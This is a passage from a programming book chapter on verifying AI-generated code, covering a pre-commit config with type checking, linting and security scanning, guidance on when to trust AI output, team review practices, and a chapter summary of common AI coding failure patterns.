      - id: ruff-format
  - repo: https://github.com/pre-commit/mirrors-mypy
    rev: v1.9.0
    hooks:
      - id: mypy
  - repo: https://github.com/PyCQA/bandit
    rev: 1.7.8
    hooks:
      - id: bandit
        args: ['-r', '--severity-level', 'medium']

Best Practice: The most effective AI verification is layered. No single tool catches everything, but combining type checking, linting, security scanning, and targeted testing creates a safety net that catches most AI-generated issues before they reach production.

When to Trust AI More

AI output is more reliable when:

  • The task is well-defined and common (CRUD operations, standard algorithms, common patterns)
  • The prompt includes clear constraints and examples
  • You are working with popular, well-documented libraries
  • The generated code is short and focused
  • You can easily test the output

When to Trust AI Less

AI output requires extra scrutiny when:

  • The task involves security-critical logic
  • The problem is novel or domain-specific
  • The code interacts with external systems or APIs
  • The prompt is ambiguous or underspecified
  • The generated code is long and complex
  • The task involves concurrency or distributed systems
  • You are working with niche libraries or recent API changes

Building Organizational Resilience

For teams using AI coding assistants, consider:

  • Code review remains essential. AI-generated code should go through the same review process as human-written code. Reviewers should be trained to watch for AI-specific failure patterns.
  • Track AI-generated incidents. Keep a log of bugs that originated from AI-generated code. Look for patterns — this tells you where your verification process has gaps.
  • Share knowledge. When someone on the team discovers a new AI failure pattern, share it with everyone. Build a team-specific "AI gotchas" document.
  • Update prompts. If a particular type of error keeps recurring, update your prompt templates to explicitly guard against it.

Real-World Application: Companies that successfully adopt AI coding at scale report that their bug rates initially increase as developers learn to use AI tools, then decrease below pre-AI levels as developers internalize the trust-but-verify mindset and build automated verification pipelines. The transition period typically takes 2-3 months.


Chapter Summary

AI coding assistants are powerful tools that make mistakes. The key to using them effectively is not to avoid mistakes — that is impossible — but to catch them quickly and systematically.

We covered:

  • Hallucinated APIs: AI invents functions, classes, and entire libraries. Verify imports immediately.
  • Logic errors: Off-by-one, boundary conditions, race conditions, and incorrect algorithms. Test edge cases rigorously.
  • Security vulnerabilities: SQL injection, XSS, hardcoded secrets, path traversal, insecure deserialization, weak crypto. Cross-reference against OWASP.
  • Performance anti-patterns: N+1 queries, quadratic algorithms, blocking I/O, unnecessary copying. Review time complexity.
  • Outdated patterns: Python 2 remnants, deprecated APIs, old framework patterns. Check current documentation.
  • The confidence problem: AI never says "I don't know." Watch for signals and develop your "that's too easy" instinct.
  • Systematic debugging: Use the VERIFY framework — Validate imports, Examine edge cases, Review security, Inspect logic, Find performance issues, Yell about types.
  • Recovery strategies: Start fresh, targeted reprompt, incremental rollback, constraint fencing. Know when to abandon a conversation.
  • Trust-but-verify: Use AI freely but verify rigorously. Automate verification with type checking, linting, security scanning, and tests.

The developers who are most effective with AI are not those who never encounter bugs — they are those who have systems for catching bugs before their users do. Build those systems, internalize the trust-but-verify mindset, and AI-generated code will be a massive accelerator rather than a liability.


Next chapter: Chapter 15: CLI Tools and Scripts — We move into Part III and start building real software, beginning with command-line tools and automation scripts.